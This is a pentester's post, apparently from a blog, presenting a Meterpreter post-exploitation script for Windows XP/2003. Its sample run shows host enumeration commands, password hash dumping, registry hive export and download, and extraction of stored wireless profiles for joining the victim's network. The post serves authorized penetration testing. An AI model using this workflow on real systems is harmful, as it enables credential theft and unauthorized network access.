Guys I recently made a small quick and dirty Meterpreter script for enumerating and gathering all the typical information I tend to gather out of Windows 2003 and XP hosts after a compromise. Since in most engagements I'm not allowed to install any software on the target hosts I made it so it will use windows native command line tools.

here is a sample of running it, once a machine is exploited and meterpreter is deploy just type run winenum to launch the script:

meterpreter > run winenum 
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on[*] Executing: set[*] Executing: arp -a
[*] Executing: ipconfig /all
[*] Executing: ipconfig /displaydns
[*] Executing: route print
[*] Executing: net view
[*] Executing: netstat -na
[*] Executing: netstat -ns
[*] Executing: net share
[*] Executing: net view
[*] Executing: net group
[*] Executing: net user
[*] Executing: net localgroup
[*] Executing: net view /domain
[*] Executing: netsh firewall show config
[*] Executing: wmic computersystem list
[*] Executing: wmic useraccount list
[*] Executing: wmic group
[*] Executing: wmic service list brief
[*] Executing: wmic volume list brief
[*] Executing: wmic process list brief
[*] Executing: wmic startup list full
[*] Executing: wmic qfe
[*] Downloading WDSRB.txt to -> /tmp/
[*] Dumping password hashes...
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/
[*] Downloading HKLM.cab to -> /tmp/
[*] Downloading HKCC.cab to -> /tmp/
[*] Downloading HKCR.cab to -> /tmp/
[*] Downloading HKU.cab to -> /tmp/
[*] Removing anything we left behind...
[*] Done!

meterpreter >
and here is the code, you have to place it in /pentest/exploits/framework3/script/meterpreter/ and name it winenum.rb

Josh Wright from Inguardians published a great paper called Vista Wireless Power Tools on the new features of Windows Vista wireless commands plus published several tools. I added the enumerations commands to Winenum plus it will now export the registry keys where the wireless configured networks of Windows XP and Windows Vista machines is stored, this files can be imported into the pentesters windows bos to gain access to the clients network or to get the wireless keys using other tools after importing.

let me know if you like it.